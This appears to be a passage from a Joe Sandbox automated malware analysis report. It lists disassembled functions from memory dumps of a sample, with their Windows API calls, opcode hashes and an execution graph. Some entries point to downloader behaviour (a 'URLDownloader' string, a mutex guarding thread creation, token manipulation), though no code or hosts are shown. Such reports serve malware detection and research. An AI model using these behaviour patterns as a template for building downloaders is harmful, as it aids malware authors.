                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206206407-0
                                                                                                                            • Opcode ID: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                                                            • Instruction ID: ed5e708f9a507b4adfd911d3508ec20c212b5a391fedcf247e80062d61f76bb5
                                                                                                                            • Opcode Fuzzy Hash: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                                                            • Instruction Fuzzy Hash: C531C5F9E00108BBDB04EFA4D89599D7BB6EF54244F008069F9069F242EB31EAD5CB95
                                                                                                                            Function 10004EE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 10004F34
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004F51
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10004F69
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 10004F97
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 10004FB5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1216362210-0
                                                                                                                            • Opcode ID: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                                                            • Instruction ID: b6c0c3fe9f7a8ecbfd6a68903a988b9ee954c4047185b56f79f4f3260df6d144
                                                                                                                            • Opcode Fuzzy Hash: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                                                            • Instruction Fuzzy Hash: 71312FB5E40208BFEB14DBD8CC86FAEB7B5EB48710F204254F615AB2C0D671AB408B55
                                                                                                                            Function 02635DC7 Relevance: 9.0, APIs: 6, Instructions: 41synchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 02635DE1
                                                                                                                            • GetLastError.KERNEL32 ref: 02635DEA
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02635DFB
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02635E13
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 02635E1A
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 02635E2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3416154964-0
                                                                                                                            • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                                            • Instruction ID: c8dcfa5be6e03751c34a875c903a6cce589226dd58512c07190eca9620fd76a8
                                                                                                                            • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                                            • Instruction Fuzzy Hash: B5014F70A84318FBF792ABF08C8EB5D3A65EB0C702F508450F70AAA1D0DAB4D7448B65
                                                                                                                            Function 10011A40 Relevance: 7.6, APIs: 5, Instructions: 100fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                                                            • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                                                            • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                                                            • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1074265955-0
                                                                                                                            • Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                                                            • Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
                                                                                                                            • Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                                                            • Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
                                                                                                                            Function 02636548 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_raw$Main@12
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964726511-0
                                                                                                                            • Opcode ID: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                                            • Instruction ID: 8d6bd2da0b109d18a1f6a57abd8894a449e88089a21e0de1c12475fa1702624c
                                                                                                                            • Opcode Fuzzy Hash: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                                            • Instruction Fuzzy Hash: 2A218172E00219BBDB239F15CC40AAF7A6DEB81BA8B158129F91967214D3718D41DFEC
                                                                                                                            Function 10015FE6 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                                                            • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                                                            • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                                                            • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1722040371-0
                                                                                                                            • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                                            • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                                                            • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                                            • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
                                                                                                                            Function 10015F31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(1001C31C,URLDownloader,?,100015D9,1001C6D4), ref: 10015F3B
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015D9,1001C6D4), ref: 10015F6E
                                                                                                                            • WakeAllConditionVariable.KERNEL32(1001C318,?,100015D9,1001C6D4), ref: 10015F79
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 1466638765-1891997712
                                                                                                                            • Opcode ID: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                                            • Instruction ID: 2635d989befe49f68561a0190eacd187a5f89713392b86b322bdf01f88d219c5
                                                                                                                            • Opcode Fuzzy Hash: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                                            • Instruction Fuzzy Hash: 88F0C975900628DFE746DF58D8C8E957BA8FB4D394B06C069FA0987322CB34EA50CB95
                                                                                                                            Function 02624EB7 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 02624ECE
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 02624F28
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02624F40
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 02624F8C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626452242-0
                                                                                                                            • Opcode ID: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                                            • Instruction ID: 9a0447495f07f0cc5752a89e4e10452399c9de053c04902a82ddabfd36863a8f
                                                                                                                            • Opcode Fuzzy Hash: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                                            • Instruction Fuzzy Hash: 9831D1B5E40208BBEB14DBD8CD86FAEB7B5EB48710F244258F615AB2C0D671AA008F55
                                                                                                                            Function 10013A70 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1566052064-0
                                                                                                                            • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                                            • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                                                            • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                                            • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                                                            Function 100163BC Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 10016409
                                                                                                                              • Part of subcall function 10016CAE: InitializeSListHead.KERNEL32(1001C360,10016413,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016CB3
                                                                                                                            • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182EC,100182F0,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016422
                                                                                                                            • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182CC,100182E8,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016440
                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10016473
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 590286634-0
                                                                                                                            • Opcode ID: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                                            • Instruction ID: e11346addbbd0b20877a0dd20a8321200fe6c64d5ca488d70c2580f7c5b0b6f1
                                                                                                                            • Opcode Fuzzy Hash: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                                            • Instruction Fuzzy Hash: 0C212439544215ABEF01DBB49C027DD37A1EF0E3A4F108009F5966F1C2CB32E6C5C6AA
                                                                                                                            Function 10011F50 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F5D
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F6A
                                                                                                                            • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F75
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2950233615-0
                                                                                                                            • Opcode ID: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                                            • Instruction ID: d4953d2e9632dab8d67af48db5b56fd773fcfbd27f84caad3cc3cb56b92c495c
                                                                                                                            • Opcode Fuzzy Hash: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                                            • Instruction Fuzzy Hash: FA110D74E00119EFCB58DFA4D9959EDB7B5FF48200B1181A9E805AB351EB30EF45DB90
                                                                                                                            Function 10012C30 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,10012136), ref: 10012C3A
                                                                                                                            • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C4D
                                                                                                                            • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C5C
                                                                                                                            • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(100120FA,100120FA,100120F9,?,10012136), ref: 10012C80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3089488326-0
                                                                                                                            • Opcode ID: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                                            • Instruction ID: 718b455e6a9fe28b5531d214fab6855221ed4fdccad38d515428ce19cb46a070
                                                                                                                            • Opcode Fuzzy Hash: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                                            • Instruction Fuzzy Hash: 97F0AF74901108EFCB48DF98CD9599EB7B6FF48305B20819AE406A3351DB31AF15DB54
                                                                                                                            Function 02636BCB Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 02636BDD
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02636BEC
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02636BF5
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 02636C02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                                            • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                                            • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                                            • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                                            Function 10005540 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                                                            • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                            • String ID: .exe
                                                                                                                            • API String ID: 2188046178-4119554291
                                                                                                                            • Opcode ID: c8dc7b2a76f962d9c9e5e2295d0bb392a2ad8b6eac705aa3666f7bffbb178c74
                                                                                                                            • Instruction ID: 322e95b2db96aea7f088eda3d8bee12a526519093e635f9f9e857dc9ab2affb0
                                                                                                                            • Opcode Fuzzy Hash: c8dc7b2a76f962d9c9e5e2295d0bb392a2ad8b6eac705aa3666f7bffbb178c74
                                                                                                                            • Instruction Fuzzy Hash: 15513774C04248EFEB15CBA4CC91BEEBBB5EF15300F148199E1167B296DB746B48CBA1
                                                                                                                            Function 10015F82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(1001C31C,?,URLDownloader,?,100015AC,1001C6D4), ref: 10015F8D
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015AC,1001C6D4), ref: 10015FC7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 17069307-1891997712
                                                                                                                            • Opcode ID: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                                            • Instruction ID: 6adcf340ed2f6481699652d891028e0f11606ccd9733c9b7c4ba67a8641b8b52
                                                                                                                            • Opcode Fuzzy Hash: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                                            • Instruction Fuzzy Hash: 24F08234500618DFD310DF18C884E1977A4EB49676F15423DE9698F291C731D982CA52

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 20630 8206838 20631 820687b SetThreadToken 20630->20631 20632 82068a9 20631->20632

                                                                                                                            Executed Functions

